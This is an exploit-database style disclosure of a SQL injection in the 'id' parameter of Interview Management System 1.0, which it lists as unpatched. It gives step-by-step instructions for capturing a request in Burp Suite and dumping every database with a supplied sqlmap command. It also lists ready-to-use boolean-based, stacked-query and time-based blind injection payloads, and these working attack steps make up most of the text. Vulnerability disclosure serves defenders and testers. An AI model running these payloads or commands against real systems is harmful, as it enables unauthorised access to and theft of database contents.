# Exploit Title: Interview Management System 1.0 - 'id' SQL Injection  
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)  
# Date: 2020-12-10  
# Google Dork: N/A  
# Vendor Homepage:  
# Software Link:  
# Affected Version: Version 1  
# Patched Version: Unpatched  
# Category: Web Application  
# Tested on: Parrot OS  
Step 1. Login to the application with any verified user credentials  
Step 2. Click on View Candidates page and select take exam. If there is no  
candidate, click on "Add New Candidate" page, fill details and add new  
Step 3. Click on "Take Exam" and capture the request in burpsuite.  
Step 4. Save request and run sqlmap on request file using command " sqlmap  
-r request -p id --time-sec=5 --dbs ".  
Step 5. This will inject successfully and you will have an information  
disclosure of all databases contents.  
Parameter: id (GET)  
Type: boolean-based blind  
Title: Boolean-based blind - Parameter replace (original value)  
Payload: id=(SELECT (CASE WHEN (7913=7913) THEN 1 ELSE (SELECT 5980  
Type: stacked queries  
Title: MySQL >= 5.0.12 stacked queries (comment)  
Payload: id=1;SELECT SLEEP(5)#  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=1 AND (SELECT 6708 FROM (SELECT(SLEEP(5)))QTiW)